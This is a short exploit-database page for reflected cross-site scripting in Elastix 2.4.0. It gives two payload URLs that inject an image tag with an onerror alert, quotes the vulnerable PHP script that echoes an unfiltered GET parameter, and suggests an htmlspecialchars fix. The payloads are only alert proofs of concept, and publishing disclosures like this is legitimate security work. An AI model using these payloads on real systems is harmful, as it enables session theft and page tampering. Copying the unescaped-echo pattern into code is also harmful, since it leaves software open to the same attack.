[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Elastix 2.4.0 Cross Site Scripting Vulnerability

Author
cheki
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-20839
Category
web applications
Date add
03-06-2013
Platform
php
# Exploit Title: elastix 2.4.0 XSS Vulnerability
# Date: 28/05/2013
# Exploit Author: cheki
# Vendor Homepage: elastix.org
# Software Link: http://www.elastix.org/index.php/en/downloads/main-distro.html
# Version: Elastix 2.4.0 Stable
# CVE : [not yet]
-------------------------------------------------------------------------------------
exploit: https://10.10.10.78/libs/jpgraph/Examples/bar_csimex3.php/"><IMg srC= x OnerRoR = alert(1337)>
exploit2: https://10.10.10.78/libs/magpierss/scripts/magpie_simple.php?url="><IMg+srC%3D+x+OnerRoR+%3D+alert(1337)>  
--------------------------------------------------------------------------------------
Vul Code:
-----------------------------------------------
<?php

define('MAGPIE_DIR', '../');
require_once(MAGPIE_DIR.'rss_fetch.inc');

$url = $_GET['url'];   //GET Parameter Without filter

if ( $url ) {
        $rss = fetch_rss( $url );
        echo "Channel: " . $rss->channel['title'] . "<p>";
        echo "<ul>";
        foreach ($rss->items as $item) {
                $href = $item['link'];
                $title = $item['title'];
                echo "<li><a href=$href>$title</a></li>";
        }
        echo "</ul>";
}
?>
--------------------------------------------------
FOR ELASTIX development team

$url = $_GET['url']; // LOL
$url = htmlspecialchars($_GET['url']);

-------------------------------------------------

#  0day.today [2024-07-02]  #